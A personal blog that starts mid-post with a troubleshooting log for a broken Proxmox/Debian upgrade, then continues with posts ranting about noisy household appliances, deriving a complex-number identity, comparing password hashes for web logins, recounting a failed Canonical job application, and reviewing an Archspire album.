We're absolutely not going to do that, so let's use apt-mark to tell apt to leave proxmox-ve alone, and try the whole manoeuvre again:

# apt-mark hold proxmox-ve
proxmox-ve set on hold.
# apt --fix-broken install
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Correcting dependencies... failed.
The following packages have unmet dependencies:
 libanyevent-perl : Depends: perlapi-5.40.0
                    Recommends: libasync-interrupt-perl but it is not installed
                    Recommends: libev-perl but it is not installed or
                                libevent-perl but it is not installed
                    Recommends: libguard-perl but it is not installed
 libcommon-sense-perl : Depends: perl (< 5.36.1~) but 5.40.1-6 is installed
 libnss-systemd : Depends: systemd (= 257.7-1) but 252.38-1~deb12u1 is installed
 libpam-systemd : Depends: systemd (= 257.7-1) but 252.38-1~deb12u1 is installed
 libsasl2-2 : Depends: libssl3t64 (>= 3.0.0) but it is not installed
              Recommends: libsasl2-modules (>= 2.1.28+dfsg1-9) but it is not installed
 libsasl2-modules-db : Depends: libdb5.3t64 but it is not installed
 libsystemd-shared : Depends: libssl3t64 (>= 3.4.0) but it is not installed
 openssl : Depends: libssl3t64 (>= 3.5.0) but it is not installed
 perl : Depends: perl-base (= 5.40.1-6) but 5.36.0-7+deb12u2 is installed
        Depends: libperl5.40 (= 5.40.1-6) but it is not installed
 perl-modules-5.40 : Depends: perl-base (>= 5.40.1-1) but 5.36.0-7+deb12u2 is installed
 systemd : Depends: libsystemd-shared (= 252.38-1~deb12u1) but 257.7-1 is installed
           Depends: libsystemd0 (= 252.38-1~deb12u1) but 257.7-1 is installed
E: Error, pkgProblemResolver::Resolve generated breaks, this may be caused by held packages.
E: Unable to correct dependencies
[100]
#

You might think that using apt-mark hold for all the packages with unmet dependencies is the way to go, but you would be wrong, as it doesn't fix shit. You can check apt's documentation and ask the collective hivemind of the internet, but we didn't find anything to solve our problem. Then we realised that apt has a graph of all packages and their dependencies stored somewhere on the filesystem, and we found it via strace -f -e openat 2>&1 apt install --fix-missing | grep -oP "\"(.*)\"" | sort | uniq -c: it's /var/lib/dpkg/status. We can now edit it to remove the Depends: field of every package with broken dependencies to appease apt's dependencies solver via this big fat lie. Once done:

# apt upgrade
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
Calculating upgrade... Done
The following packages were automatically installed and are no longer required:

[…]

Setting up ca-certificates (20250419) ...
Updating certificates in /etc/ssl/certs...
openssl: /lib/x86_64-linux-gnu/libssl.so.3: version `OPENSSL_3.4.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libssl.so.3: version `OPENSSL_3.2.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.3.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.5.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.4.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.2.0' not found (required by openssl)
dpkg: error processing package ca-certificates (--configure):
 installed ca-certificates package post-installation script subprocess returned error exit status 1
Setting up busybox (1:1.37.0-6+b3) ...
Setting up libklibc:amd64 (2.0.14-1) ...
Setting up novnc-pve (1.6.0-3) ...
Setting up libz3-4:amd64 (4.13.3-1) ...
Setting up xz-utils (5.8.1-1) ...
Setting up libfribidi0:amd64 (1.0.16-1) ...
Setting up libopus0:amd64 (1.5.2-2) ...
Setting up libquadmath0:amd64 (14.2.0-19) ...
dpkg: dependency problems prevent configuration of python3-requests:
 python3-requests depends on python3-certifi; however:
  Package python3-certifi is not configured yet.
 python3-requests depends on ca-certificates; however:
  Package ca-certificates is not configured yet.

dpkg: error processing package python3-requests (--configure):
 dependency problems - leaving unconfigured
Setting up libproc2-0:amd64 (2:4.0.4-9) ...
Setting up proxmox-backup-restore-image (1.0.0) ...
Setting up ssl-cert (1.1.3) ...
openssl: /lib/x86_64-linux-gnu/libssl.so.3: version `OPENSSL_3.4.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libssl.so.3: version `OPENSSL_3.2.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.3.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.5.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.4.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.2.0' not found (required by openssl)
Signature algorithm of /etc/ssl/certs/ssl-cert-snakeoil.pem is not sha256. Recreating.
Could not create certificate. Openssl output was:
openssl: /lib/x86_64-linux-gnu/libssl.so.3: version `OPENSSL_3.4.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libssl.so.3: version `OPENSSL_3.2.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.3.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.5.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.4.0' not found (required by openssl)
openssl: /lib/x86_64-linux-gnu/libcrypto.so.3: version `OPENSSL_3.2.0' not found (required by openssl)
dpkg: error processing package ssl-cert (--configure):
 installed ssl-cert package post-installation script subprocess returned error exit status 1
Setting up libxcb-sync1:amd64 (1.17.0-2+b1) ...
Setting up dtach (0.9-7) ...
Setting up lsb-release (12.1-1) ...
Setting up dbus-system-bus-common (1.16.2-2) ...
systemd-sysusers: error while loading shared libraries: libsystemd-shared-252.so: cannot open shared object file: No such file or directory
dpkg: error processing package dbus-system-bus-common (--configure):
 installed dbus-system-bus-common package post-installation script subprocess returned error exit status 127
Setting up libconfuse2:amd64 (3.3-4) ...
Setting up libisl23:amd64 (0.27-1) ...
Setting up libcpg4:amd64 (3.1.9-pve2) ...
Setting up libcmap4:amd64 (3.1.9-pve2) ...
Setting up libpulse0:amd64 (17.0+dfsg1-2+b1) ...
dpkg: dependency problems prevent configuration of python3-pip-whl:
 python3-pip-whl depends on ca-certificates; however:
  Package ca-certificates is not configured yet.

dpkg: error processing package python3-pip-whl (--configure):
 dependency problems - leaving unconfigured
Setting up libquorum5:amd64 (3.1.9-pve2) ...
Setting up iptables (1.8.11-2) ...
Setting up fontconfig-config (2.15.0-2.3) ...
Setting up uidmap (1:4.17.4-2) ...
dpkg: dependency problems prevent configuration of cron:
 cron depends on cron-daemon-common; however:
  Package cron-daemon-common is not configured yet.

dpkg: error processing package cron (--configure):
 dependency problems - leaving unconfigured
Setting up python3-typeguard (4.4.2-1) ...
Setting up rsyslog (8.2504.0-1) ...

[…]


dpkg: error processing package pve-manager (--configure):
 dependency problems - leaving triggers unprocessed
Processing triggers for man-db (2.11.2-2) ...
Processing triggers for sgml-base (1.31+nmu1) ...
Errors were encountered while processing:
 ca-certificates
 python3-certifi
 ssl-cert
 python3-requests
 dbus-system-bus-common
 cron-daemon-common
 liblwp-protocol-https-perl
 libwww-perl
 python3-pip-whl
 cron
 libpve-common-perl
 libproxmox-acme-perl
 python3-pyvmomi
 libpve-apiclient-perl
 dbus
 libpve-guest-common-perl
 libpve-storage-perl
 libpve-access-control
 libpve-cluster-perl
 libpve-http-server-perl
 pve-ha-manager
 libpve-cluster-api-perl
 libpve-notify-perl
 pve-manager
E: Sub-process /usr/bin/dpkg returned an error code (1)
[100]
#

Things are still broken, but less so, at least apt is able to upgrade/install/manage/… packages. Now it's simply a matter of running dpkg --force-all --configure -a, apt-get install --fix-missing and apt install <PACKAGE> (with <PACKAGE> being things listed in the Errors were encountered while processing: errors from the other commands) until you get no more errors. At this point, you can reopen /var/lib/dpkg/status, uncomment the lines you commented if they're still present, and resume your apt dist-upgrade. Still, it's sad that in 2025 a package manager is a simple SIGINT away from being completely broken.

Objects should shut the fuck up

2025-07-29T21:15:00+02:00

I have a small car, and it has a dual-tank: gas and LPG, which is a great way to reduce my car-related budget, as LPG is way cheaper. Unfortunately, when the tank is starting to get depleted, the car will emit strident and loud beeps to notify me about it. And every single time time, it startles me like Hell, which isn't something I appreciate very much, especially when I'm steering a 1 ton metal box to overtake a trailer at 130km/h on the highway. To make things even double-plus-good, a full-screen "LPG tank almost depleted!" message will cover the whole dashboard. The very same dashboard that constantly have at its bottom the current level of said LPG tank.

The only time I want my car to maybe make some noise is when some critical shit is happening, like the oil level decreasing at an alarming rate. Having it yell at me that I'm only able to drive around 100 more kilometers on LPG, while I have a full gasoline tank affording me a total autonomy of like 1000 kilometres is anything but. I hate this, I hate that it's not configurable, I hate that it's waking everyone asleep in the car (especially toddlers), and I fucking hate that my car is actively lowering the safety of its passengers by scaring its driver. And of course, the notification will repeat a couple of times, at seemingly random intervals, likely because the complete bellend who designed this terrible scheme is taking the ever-lowering worldwide car-crash statistics as a personal affront, and is on a mission from God to fix this.

This major papercut made me think about how making noise for anything but the direst emergency should be an off-by-default privilege that only the user can explicitly grant, instead if being the default for all electricity-powered objects. I'm a CyberSecurity Professional™, earning a living breaking into computer and computer-adjacent systems, so I own the bare minimum in terms of Smart Devices™, and yet, yet I realised that I still have a non-zero amount of infernal noise-making crap.

For example, my washing machine has an obnoxious alarm when it completes a cycle, that can fortunately be disabled via a (hidden!) menu. Now, I get it, it might be useful to have some kind of alarm so that you don't forget your soaking clothes and have them rot into a new variant of whatever medieval disease. But, the alarm, while exceedingly loud, only lasts a handful of seconds, making it close to useless. Moreover, if you forget your laundry long enough for it to decay, you kind of deserve to have a Nurgle cult growing in your basement. Even assuming for the sake of the argument that this anti-feature could somehow be useful, this isn't the only yapping caused of this fiendish machine: the fucking "beep" happening every time one turns the knob or presses a button can't be deactivated. And don't you fucking dare talk to me about accessibility: all buttons are touch-sensitive, so useless to visual-impaired users, and all tones are exactly the same, making them absolutely useless for anything but waking up/startling the sleeping and unsuspecting house inhabitants. But this isn't everything, of course there is more: it has a "cute" tone when it starts, for no fucking reason at all. Why is this a thing? Who the fuck thought it would be a good idea? What's the reasoning behind this? It's a washing machine, there is no complicated fragile boot sequence, no hazardous warm-up shenanigans: I press the power-on button, it starts. Imagine having this ludicrous behaviour on all your objects: Opening your faucet? "DUDUDUDUUUUUUUU!" Unlocking your front-door? "LULULUUUUULULUUUUUU!" Turning on the cooktop hood? "LALALAAAAAAALAAAAAALAAAAA!" Maybe turning your lights on in your living room? The Ride of the Valkyries starts blasting at full volume.

As electricity is green-ish and cheap-ish where I'm living, I have the luxury of having a drier as well, forming an unholy honky duo with the washing machine: while it thankfully doesn't have a startup sound, the interaction-beep can't be disabled there as well, nor can the alarm. You know, the alarm telling me that my clothes are dry… There is no reasons, let alone urgency, that I should get any form of audio notification about this. I could spent 6 months in the hospital after a car crash because of the aforementioned LPG seven trumpets, come back to my place, and find my cloths still impeccably dry.

The kitchen isn't spared either: my hotplates will try their very best to make everyone deaf should something like a dishcloth, or perish the though, some water be present on more than two touch-sensitive buttons at once. I fail to conceptualize what the issue is here, and why this warrants all this racket: doing nothing would be perfectly acceptable. Heck, if something really has to be done for whatever regulation bullshit or whatnot, how about blinking the lights used to convey that the plates are hot? Or, if you really need to take action, just turn them off automatically. Really, anything but something that would shame a car alarm in every way.

But the very best, my complete favourite, "the world class, maybe even the world champion" (kudos if you know where this is coming from), is a fucking baby-phone that beeps when you turn it on. The use-case is "monitoring a sleeping child", and the loud beep tends to wake the aforementioned kid up. May the gormless cock-up who created this absolute potato of a device spend his entire life walking on legos.

Fortunately, everything isn't complete garbage in this world, and I even have a couple of examples at hand:

My dishwasher: no sound whatsoever, it simply opens up when it's done.
My fridge: should I improperly close its door, it'll emit some faint noise for like 30 seconds. It's a totally valid important notification, as nobody wants to burn electricity to cold the room while the food goes bad.
My ebook reader: it's physically unable to produce any sound.

The world is dire enough as it is without having me adding to my shopping criteria "does it shut the fuck up?" to an already long list. If you're designing objects, please take some time to test their notification mechanism near an asleep toddler and/or a sleep-deprived lunatic, instead of making piling more noisy interruptions to our already notification-saturated reality.

Why is log(i^i) + pi/2 = 0?

2025-07-11T15:45:00+02:00

I was watching Lennart Augustsson's MicroHs, a tiny Haskell Compiler talk, and saw that he mentioned a pretty neat equality: $$log(i^i) + \frac{\pi}{2} = 0$$, and punctued it with a casual "it's obvious if you think about it." And even though I dislike trigonometry and complex numbers, it's indeed pretty trivial, thanks to Euler's identity, as usual when dealing with exponentials and complex numbers:

%% \begin{aligned} e^{i\pi} = -1 &\iff e^{i\pi} = i^2\\ &\iff \log{e^{i\pi}} = \log{i^2}\\ &\iff i\pi = 2 \log{i}\\ &\iff \pi = 2\frac{\log{i}}{i}\\ &\iff \frac{\pi}{2} = \frac{\log{i}}{i}\\ &\iff \frac{\pi}{2} = -\log{i^i}\\ &\iff log(i^i) + \frac{\pi}{2} = 0\\ ■ \end{aligned} %%

Nothing too complicated indeed, and you can use this to get the value of $$i^i$$, which is $$e^{-\frac{\pi}{2}}$$.

Why you might want to use bcrypt for web applications

2025-06-25T16:15:00+02:00

Passwords handling, despite its apparently triviality, is anything but. It usually comes up in two distinct use-cases:

One needs to encrypt something, but only has a password to do so. This include for example password managers, disk/file/backups/… encryption.
One needs to authenticate users in an interactive way, like users logging on a website.

For the former, the resources budget is pretty high: having your full-disk encryption take a couple of seconds to unlock itself is not only acceptable, but expected and kind of reassuring. For the latter, things are much more constrained, and for the rest of this post, we'll focus on it.

What we're trying to do here, is to make it as hard as possible for an attacker in possession of the database of our website to bruteforce the hashes to obtain the clear-text passwords of our users. As people tend to reuse passwords or variations across services, password leaks are a valuable resource for miscreants. And even if everyone was using unique passwords, storing them hashed increases the time it takes for an attacker to compromise accounts, increasing the odds that the breach will be discovered and passwords forcibly changed before being misused.

Let's have a look at what kind of levers we have at our disposition to make the process of cracking the hashes expensive for an attacker:

Computational hardness: chain computations to make them hard to parallelize/distribute.
Memory-hardness: requiring a significant quantity of memory, forcing an attacker to get a ridiculous amount of it to bruteforce at scale.
Cache-hardness: making the computation move a lot of memory around or access it in fast weird/pseudo-random patterns, to eat a significant amount of bus bandwidth and force the attacker to put data outside of the CPU/GPU cache.
CPU-hardness: make the attacker pay a proportionally huge CPU cost in exchange of reducing the memory requirements.

name	creation/release date	computationally hard	memory-hard	cache-hard	CPU-hard
MD5	1992	no	no	no	no
bcrypt	1999	yes	no	barely	no
PBKDF2	2000	yes	no	no	no
scrypt	2009	yes	yes	no	no
Argon2	2015	yes	can be	Argond2ds	yes
yescrypt	2018	yes	yes	yes	yes

For a small web application, we:

Can spend some CPU time computing the hash, but not too much, as users are expecting to be logged in almost instantaneously.
Can't afford to have a significant amount of RAM consumed every time a user authenticates.
Can absolutely afford to trash the caches.
Don't really care about CPU hardness, as we can't afford to use a lot of memory anyway.

So our main lever in our case is cache-hardness, leaving us with 3 candidates:

Argon2: while there is a cache-hard variant (Argon2ds), it was added after the Password Hashing Competition ended, in its specification version v1.2.1, and thus isn't really implemented/used/ anywhere.
yescrypt: too complex for small-scale deployments.
bcrypt: only barely cache-hard, due to its use of Blowfish whose key-dependent s-boxes are taking 4k of memory, which is small compared to today's CPU/GPU L1 caches, but it's better than nothing.

Now, bcrypt has some footguns, but if you're using a proper language or a well-designed library, those will handle them for you. Of course, if you're building a serious™ project, please do reach out to your friendly neighborhood security person, as again, password handling is a hard problem.

If you'd like to learn more on the topic, I'd recommend Solar Designer's Energy-efficient bcrypt cracking and yescrypt: large-scale password hashing, as well as Niels Provos' Bcrypt at 25: A Retrospective on Password Security, the Password Hashing Competition - Survey and Benchmark, Steve Thomas' bscrypt - A Cache Hard Password Hash talk, Soatok's blog posts on the topic, and more generally, the hashcat, HashMob and John the Ripper password cracking communities.

My experience with Canonical's interview process

2025-06-01T09:30:00+02:00

Context

I left Google in April 2024, and have thus been casually looking for a new job during 2024. A good friend of mine is currently working at Canonical, and he told me that it's quite a nice company with a great working environment. Unfortunately, the internet is full of people who had a poor experience: Glassdoor shows that only 15% had a positive interview experience, famous internet denizens like sara rambled on the topic, reddit, hacker news, indeed and blind all say it's terrible, … but the idea of being decently paid to do security work on a popular Linux distribution was really appealing to me.

First application

I first applied there in October 2023. Canonical's careers' website asks a bunch of odd questions like:

How did you perform in mathematics at high school?

How did you perform in your native language at high school?

Please share your rationale or evidence for the high school performance selections above. Make reference to provincial, state or nation-wide scoring systems, rankings, or recognition awards, or to competitive or selective college entrance results such as SAT or ACT scores, JAMB, matriculation results, IB results etc. We recognise every system is different but we will ask you to justify your selections above.

What was your bachelor's university degree result, or expected result if you have not yet graduated? Please include the grading system to help us understand your result e.g. ‘85 out of 100’, ‘2:1 (Grading system: first class, 2:1, 2:2, third class)’ or ‘GPA score of 3.8/4.0 (predicted)’. We have hired outstanding individuals who did not attend or complete university. If this describes you, please continue with your application and enter ‘no degree’.

As I was applying for a senior position, and because there was no such thing as ranking in my entire scholarship, I didn't think much about this, and wrote that I wasn't bad at school, and that there was no ranking. I got instantly rejected. I asked around, and some Canonical employees reached out to me on mastodon to tell me that I should lie on this step of the hiring process, as people who aren't in the top 10% in high-school are automatically rejected. So I made things up, and didn't get rejected this time.

I then got an email about the "written interview", asking me to provide my answers to 38 questions in a PDF. It took me a couple of hours to write it down, boiling down to 21 pages of text. Once sent, I was asked to do ~~modern phrenology~~ "psychometric assessments" from Thomas. The first one is called the General Intelligence Assessment, and features with questions like those:

"Bob isn't as fast as Carl" → Who is the fastest? Carl or Bob?
"a B f H" vs "k b j z" → how many letters in common? (1)
Given 3 numbers, find the bigger and smaller, which one is the farthest from the middle one?
Given a group of 3 words, which one has nothing to do with the 2 other?
Given a pair of letter "R", with some rotated and some mirrored, how many are only rotated?

The second one is the Behavioural Assessment, and is based on picking "the word that corresponds the most to your personality and the one that corresponds the least" for 30 minutes. Their "methodology" is based on the DISC assessment from 1928 which is completely made-up pseudo-science. Heck, even their brochure only has 5 references with none from after 1957, and the 5 mentioned "studies" don't have sources, data, details, … This made me equally amused and worried.

The technical interviews ("Ubuntu Skills Interview", "Security Skills Interview", "General Management Skills Interview") felt a bit empty content-wise, and sounded more like some random conversation with open-source enthusiast people at a bar. The only technical questions I remember were "What's your favourite git command" and "Can you tell me about Ubuntu packaging". Keep in mind that the position I was applying for was "Ubuntu Engineering Manager", so I was expecting a lot of technical questions. Don't get me wrong, the conversations were really nice, and I really liked the reflections on Canonical's positions and philosophy.

In December, I had an HR interview with a "Talent Science Partner", which was a regular bland STAR questionnaire. Here is some feedback from the interviewer: "In the first 5 minutes of the call, I asked them about their biggest achievement at NBS and they replied "Apparently you haven't read my 20-pages written interview". I then explained to him that I have to ask the same questions to all candidates and they offered me a terse answer." What's the point of asking for an extensive written interview with those very same questions, only for it to be completely ignored? It felt disrespectful to me. Also, amusingly "During our interview, they will [sic.] be typing away.", so candidates aren't expected to take notes. I was simply writing the questions down, as well as some of my answers, likely the very same thing that the interviewer was doing.

A couple of hours later, I got a "Follow up - Benefits at Canonical" email, listing all the benefits, but less than 24h after, I got the very same automated rejection email I got when I first applied in October. I sent an email to enquire about feedback but never got a reply. During the whole process, I was not once able to ask questions to a recruiter.

Second application

A couple of months later, I decided to reapply, hoping that maybe the previous rejection was a misunderstanding or whatnot, even though seeing that Canonical had more than 32 000 job openings ~~smelt like bullshit~~ was worrying.

I applied both for a Manager position and an Individual Contributor one. I got instantly rejected for the former via an automated email, sent twice; but was invited to continue the process for the latter, via the "Fast Track - Security." I learnt that this didn't mean that there would be less interviews or that the process would somehow be faster, but simply that my resume was interesting enough to warrant interviewing me before picking a team for me to fit in, a bit like how Google is hiring.

I re-used the written interview, as the questions didn't really change. This time, I also had to spend 2h on DevSkiller for a bland-at-best "Python test." The first part was questions like "Which ones of those words aren't python logging levels: URGENT, CRITICAL, INFO, FATAL, TRACE, …" or "What does this small python snippet output" which is a matter to copy/pasting in into a python interpreter locally. The second part was LeetCode-like exercises, but since there were no humans involved, odds are that the only piece of information that can be extracted from the candidate is "can they successfully paste the question verbatim into a search engine/LLM."

Funnily enough, while I could re-use my "psychometric assessments," I chose to pass the tests again, so I could compare the results, and of course, they showed some differences. This was followed by a weird "The security mission and roles at Canonical" email from Mark Shuttleworth himself, with a Message-ID …prod-greenhouse-sidekiq-automation-worker…, meaning it's another generic automated email, sigh. Then came the interviews. I systematically asked the following questions in all but the final one:

What do you think about the interview process?
- I often got praise about the written interview part, albeit nobody liked the process as a whole. Some high-in-the-chain people told me that they didn't really like spending time reviewing CV and interviewing people for a couple of hours every week. Heck, some of them that interviewed me weren't even going to work with me.
Do you like working at Canonical?
- The answers were a resounding yes, which kept me motivated to go through the process.
How is the upper-management, especially Mr. Shuttleworth, as I'll have an interview with him and it feels a bit weird, but also because I've heard things™?
- Those who work/worked with him told me (I took notes) that he was peculiar, involved, intense, special, opinionated, could come across as rude/harsh/know-it-all, and sometimes difficult to work with.
I politely tried to gather feedback on the interviews, and was either told that they couldn't answer this question, or that I shouldn't need to worry as "everything looks green on the feedback."

Some interviews were pleasantly technical, and I really enjoyed the "Security Deep Dive" one about confidential computing. The "Hiring Lead Interviews" felt a bit useless, generic and similar, but provided some welcome colouring to how it is to work at Canonical. Hilariously, someone from the team I applied for told me that the role has been empty for more than 18 months, and offered a polite smile when asked why she thought that was the case.

The final interview was with Mark Shuttleworth. He didn't introduce himself, which I found a bit odd. His first question was whether I was applying for a managerial or a senior position, which didn't bode well: he had no idea what position I was applying for, and thus wouldn't be asking role-related questions, but likely only "vibe" ones. I got asked questions about high-school: how I performed there, why did I pick a particular university, … I was so surprised that I didn't think about asking on the spot how was any of this relevant for a fucking senior position. I did so afterwards, and was told that one of the sole common point for all Canonical employees is that they all attended high-school, so it provides a common base. Moreover, it gives some background, personal history and shows the motivations and goals of the applicants. I don't know about you, but when I was in high-school (around 15-20 years ago), my goals and motivation were really different than my current ones, as they were mainly, ranked in order of interest and importance: getting laid.

To the question "How was your university?", I answered that it wasn't prestigious, and pretty small and rural, as we could see cows from the windows. Shuttleworth immediately interrupted me to say "don't play games, don't try to muddle your answers. I'm interviewing you for a senior position, I'm asking you questions, I'm expecting straight answers." I was so flabbergasted that instead of answering properly ("As I'm interviewing for a senior position, I'm expecting proper senior position related questions."), I gave a meek "Okay…" Some parts of the conversation were equally awkward and filled with an unhealthy amount of salt, especially about upstart ("They're a reason why Chromebooks are using it", the reasons are mostly technical debt, not technical excellence.), mir ("Wayland has the same design flaws as Xorg"), … At some point, someone bought him a plate, and he started to eat, without excusing himself about doing so. I asked him why he would spend time interviewing prospective employees in non-executive positions, let alone individual contributors, as this is likely eating a lot of his time, given that Canonical currently has around 1200 employees. He told me that he like to know who is hired, and that this process allows to root out average candidates. After 40 minutes out of a 60 minutes scheduled interview, Shuttleworth said "Ok, nice talking to you, have a nice day," and abruptly ended the interview. I seriously thought about withdrawing my application, as I really didn't want to work with him, but since the position was only senior IC, odds are that I wouldn't have to, so I didn't retract it.

A couple of days after, I got the now familiar automated rejection email. I asked the hiring lead for feedback about why the rejection happened, but didn't get a reply. Not once during all the interviews have I had a conversation about compensation/salary/benefits/…

So I exercised my GDPR rights, and asked to be communicated everything pertaining to my interviews. I got a bunch of documents, and the reason I was rejected was "Culture/behaviour/motivation misalignment." Overall, would-you-hire-wise I got three "strong yes", eight "yes", and a single "no" from Mark Shuttleworth, with his feedback as following:

This interview did not go well at all; the candidate initially gave startlingly passive-aggressive responses to questions, in a way that I very rarely see at this late stage of the process. Their application was a duplicate with the same email address, and previously they had given a similar impression in Talent Science. I would like to understand why that duplicate, and outcome, were not noticed during this selection process.

After some difficult exchanges I focused on the candidate's personal interests, where they opened up. They are clearly passionate about low-level technical details, but are only engaged on things that personally interest them, with little evidence of teamwork or willingness to share load that is uninteresting to them. They would be a poor fit for a team where balancing work requires deriving some personal satisfaction from helping colleagues get things done.

In short, there are character issues here that we cannot address through coaching and development.

Now, to be fair, everyone who knows me would likely agree that I'm not the most empathetic person ever, and that communication isn't my strongest point, despite me investing a lot of care and effort there, as it's an important topic for me: I'm Asperger, meaning that a lot of social interactions, especially non-verbal and implicit ones are often non-trivial for me, and that I tend to be (sometimes overly) frank; but it's the very first time this came up as an issue, let alone a prohibitive one, in a professional setting. The two other Hiring Lead who assessed my "Personality Traits" didn't find anything proscriptive there, nor in any other categories for that matter. Interestingly, Shuttleworth's feedback is the only one without any supporting notes nor direct quotes, and reads more like an opinion piece than a proper artefact-supported assessment like the rest.

So now I'm really curious about the decision process here, as it seems that every interviewer's opinion is ignored if Shuttleworth puts some red marks. Would the outcome have been the same if it were someone else who had put them instead?

Conclusion

I was really looking forward to work at Canonical, being paid to work on improving a popular Linux distribution security sounded really cool. I now see that I should have, for once, listened to the collective hive-mind of the internet, and not pour so much of my time and energy into this. I'm of course a bit salty about the process, but not about the outcome, as it felt like I dodged some kind of massive bullet.

A friend suggested that I add some actionable advice hiring-wise to this blogpost so that it doesn't read too much like an angry rant about not being hired, but it felt pretentious to me. Moreover, as it seems that hiring at Canonical is Shuttleworth's pet project, I don't think my opinion on the topic will be useful in any way. Heck, I bet all the senior people spending some of their expensive work time doing interviews are frustrated when candidates they deem promising are rejected at the very of end on Shuttleworth's whim; yet as this has apparently been going for a while now, so I doubt a ranty article on my small corner on the internet would hold any sway. So if I didn't write this article to complain, nor to make things change, why bother? I wrote it because I would have loved to have read a post like this one while considering applying at Canonical, as it would have saved everyone involved a tremendous amount of time.

As a side note, it's completely ludicrous that I had to use the GDPR to get some feedback on what went wrong on a job interview: the hiring lead could simply have replied to my email with some high-level explanation, which would have saved them from being GDPR'ed almost 300 pages of unredacted PDF.

This article was apparently posted on hacker news, the thread has some interesting testimonies as well. Since it was published, I got some interesting tidbits/feedback from (ex-)canonical people:

That "don't play games" comment, he pulled that shit all the time, the mind-disrupting emotional suckerpunch.

Yep, it is indeed completely standard for Mark to nix strong candidates at the last stage after everyone else has left positive feedback on them. And roles stay open for years while everyone else tries to cover for them. This process is "scientific" and "data-driven" and no internal argument about it is brooked. Many other things about Canonical are great, but the hiring process is grim.

Amusingly, Canonical recently published a How to get a job at Canonical blogpost, see how many cases of your "toxic/worrying hiring practises" bingo cards it can score!

Timeline

2023/10/19: First time applying at Canonical
2023/10/20: Automated rejection email
2023/11/07: Told by Canonical employees that I should put "top 10%" to not get auto-rejected
2023/11/??: Applied again
2023/11/10: Written interview email
2023/11/16: Psychometric assessment for Ubuntu Security Manager at Canonical - General Intelligence Assessment email
2023/12/11: General Management Skills Interview with Person 1
2023/12/12: Ubuntu Skills Interview with Person 2
2023/12/12: Security Skills Interview with Person 3
2024/01/11: Interview with HR with Person 4
2024/01/11: "Benefits at Canonical" email
2024/01/12: Automated rejection email
2024/06/15: Second time applying at Canonical
2024/06/18: Leetcode test at DevSkiller email
2024/07/01: "Psychometric tests" email
2024/07/15: "We're excited to move forward with interviews for Security Software Engineer at Canonical." email
2024/07/18: Software architecture and engineering skills interview with Person 5
2024/07/19: Linux system skills interview with Person 6
2024/07/19: Security deep-dive interview with Person 7
2024/08/04: "Behavioural assessment for Security Software Engineer at Canonical" email
2024/08/05: Met Stephanie Domas (Canonical's CISO) at Black Hat, who recommended me to apply at Canonical, and even got a warm recommendation from her husband whom I've met almost a decade ago at REcon.
2024/08/20: Talent Interview with Person 8
2024/08/22: Hiring Lead Interview with Hiring Lead Person 9
~~2024/08/29: Hiring Lead Interview, with Person 10~~ cancelled
~~2024/08/29: Hiring Lead Interview, with Person 11~~ cancelled
2024/09/03: Hiring Lead Interview, with Person 10
2024/09/04: Hiring Lead Interview, with Person 11
2024/09/13: Hiring Lead Interview, with Person 12
2024/09/23: Hiring Lead Interview, with Person 13
2024/09/27: Hiring Lead Interview, with Mark Shuttleworth
2024/09/30: Generic rejection email
2024/09/30: Sent an email to the Hiring Lead asking for feedback
2024/10/08: Sent an email to dataprotection@canonical.com exercising my GDPR rights to get information about why I was rejected
2024/10/30: Got the GDPR info, 300 pages of PDF.
2025/06/01: Got pinged by a friend of mine about "that canonical article", so decided to publish it.

Archspire - Relentless Mutation

2025-05-22T18:15:00+02:00

I'm a huge fan of technical death metal, from the old stuff like Cynic and Necrophagist, to the newest-ish Obscura, Equipoise and Beyond Creation. Unfortunately, one the common issues with this sub-genre is that it tends to be technical for the sake of it, resulting in insipid stuffing of pointlessly technical technicalities all around on top of wanking on never-ending licks and blast beats, without any consideration for consistency, structure building, let alone artistic taste.

But, not Archspire! Relentless Mutation is the third full-length from this Canadian band, released on the 22nd of September 2017 via Season of Mist. Surprisingly short by clocking at only 31 minutes, but if it was played at "normal" speed it would likely be around 60min I guess. The tracks are flowing into each others, while being completely distinct despite being, well "technical death metal". It's one of the few albums where it's trivial to remember which song was which after a few listening, which while being a low-low bar, is unfortunately worth noting. Moreover, the album is surprisingly melodic: one can hum the tracks, which is again, low bar, yet again needs to be mentioned. It never feels like they're being fast for the sake of being fast: the music is shockingly great, not some pointless tech death speedrun any% shredding.

The musicianship on this album is absolutely incredible and it helps that it can actually be heard in the mix: Unlike their previous albums The Lucid Collective and All Shall Align, the mixing is way better: no more lyrics relayed to a muted background noise or fuzzy guitars. Things are detailed and crisp, everything in its right place and nothing feels too loud or too quiet. And given the complexity, speed and layering of the music, it's no small feat to achieve something this clear cut!

Now, it's impossible to write this without sounding cliche, but the guitarists and bassists truly take technical playing to a whole new level. The sheer speed, precision, and creativity of their riffs in literally every song is undeniably jaw dropping, with some clear neo-classic influences. Something that makes the whole album utterly pleasant is that the melodies never seem to follow exactly where the ear would take them, always surprising the listener. While guitar solo aren't my jam, as their tend to be, once again, aimless and intrusive wanking on tedious licks, it's not the case here: they don't feel out of place, and are often slower than the main riffs, as I guess they can't play much faster anyway.

